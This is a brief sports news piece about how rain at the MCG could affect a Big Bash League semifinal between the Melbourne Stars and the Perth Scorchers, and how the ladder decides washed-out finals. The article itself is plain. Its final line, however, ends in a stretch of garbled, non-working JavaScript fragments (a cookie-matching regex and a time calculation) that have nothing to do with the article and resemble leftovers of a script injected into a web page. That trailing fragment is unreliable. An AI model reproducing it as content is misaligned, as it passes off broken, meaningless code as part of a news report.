Melbourne is currently being drenched with constant rain and the forecast for the rest of the day does not look good. So what does that mean for tonight's semifinal between the Melbourne Stars and the Perth Scorchers at the MCG tonight?

Here are all the scenarios:

If the constant rain continues and the match is completely abandoned, then the team that finished higher on the ladder in the regular season, in this case the Melbourne Stars, who finished second, will advance to the final.

However, a match can only be considered abandoned if less than five overs have been completed in each innings.

If the Big Bash final in two days time is also a washout, then the same situation applies.

The team that finished higher on the ladder of the two finalists will be crowned champions. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
